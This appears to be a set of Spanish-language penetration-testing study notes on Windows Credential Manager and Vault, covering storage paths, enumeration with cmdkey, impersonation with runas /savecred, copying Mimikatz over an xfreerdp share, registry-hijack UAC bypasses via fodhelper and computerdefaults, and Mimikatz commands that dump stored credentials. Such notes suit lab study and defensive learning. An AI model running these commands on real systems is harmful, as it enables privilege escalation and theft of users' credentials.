🗄️ Administrador de Credenciales y Bóveda de Windows

l Administrador de credenciales es una característica integrada en Windows desde Server 2008 R2 y Windows 7. Permite a los usuarios y aplicaciones almacenar de forma segura credenciales para otros sistemas y sitios web.

Las credenciales se guardan en carpetas cifradas bajo los perfiles de usuario y sistema (MITRE ATT&CK):

%UserProfile%\AppData\Local\Microsoft\Vault\ %UserProfile%\AppData\Local\Microsoft\Credentials\ %UserProfile%\AppData\Roaming\Microsoft\Vault\ %ProgramData%\Microsoft\Vault\ %SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\

Cada carpeta contiene un archivo Policy.vpol con claves AES (AES-128 o AES-256) protegidas por DPAPI, que cifran las credenciales 🔐.

Windows más recientes usan Credential Guard para proteger las masterkeys DPAPI en enclaves de memoria seguros 🛡️.

Terminología:

📝 Tipos de credenciales almacenadas

Nombre Descripción
Credenciales web 🌐 Para sitios web y cuentas en línea (IE y Edge heredado).
Credenciales de Windows 💻 Tokens de inicio de sesión para servicios como OneDrive, usuarios de dominio, recursos de red y carpetas compartidas.

💾 Exportar credenciales

Se pueden exportar Windows Vaults a .crd desde el Panel de Control o con:
Pasted image 20250823123506.png
C:\Users\sadams> rundll32 keymgr.dll,KRShowKeyMgr

Esto abre la ventana de Administrador de Credenciales, donde se pueden agregar, eliminar o editar credenciales ✏️.


🔎 Enumeración de credenciales con cmdkey

cmdkey /list

{555B460B-1272-4B46-8A00-EA2DA2B42B0D}.png

Formato de salida:

Clave Valor
Objetivo 🎯 Recurso o cuenta que usa la credencial.
Tipo 🔑 Generic (general) o Domain Password (dominio).
Usuario 👤 Cuenta asociada.
Persistencia 💾 Local machine persistence indica que sobrevive reinicios.

(Domain:interactive=SRV01\mcharles) es de dominio, útil para runas:

podemos usarla runas para hacerse pasar por el usuario almacenado de la siguiente manera:

runas /savecred /user:SRV01\mcharles cmd

🐍 Extracción con Mimikatz

Primero deberiamos pasar el mimikatz pro xfreerdp

xfreerdp /u:<usuario> /p:<contraseña> /v:<IP> /drive:share,/home/kali/mimikatz

Luego copiamos el ejecutable donde queramos 📂.

{35D27AC6-1674-465E-9486-E72057D4A220}.png
🔑 Bypass de UAC (Opcional)

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe

computerdefaults.exe:

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && start computerdefaults.exe

Esto permite privilegios elevados ⚡🛡️.
{DE9F0A06-C8E1-4A98-AD54-3F0BBB403F31} 1.png


⚡ Ejecutar Mimikatz

privilege::debug  
sekurlsa::credman
vault::cred

{C3264954-5F0E-4CC2-9A30-721BFA826EBF}.png
Esto extrae credenciales almacenadas en Credential Manager 🔑.

Ejemplo: encontramos la contraseña de OneDrive de un usuario 💻🌐.
Pasted image 20250823131847.png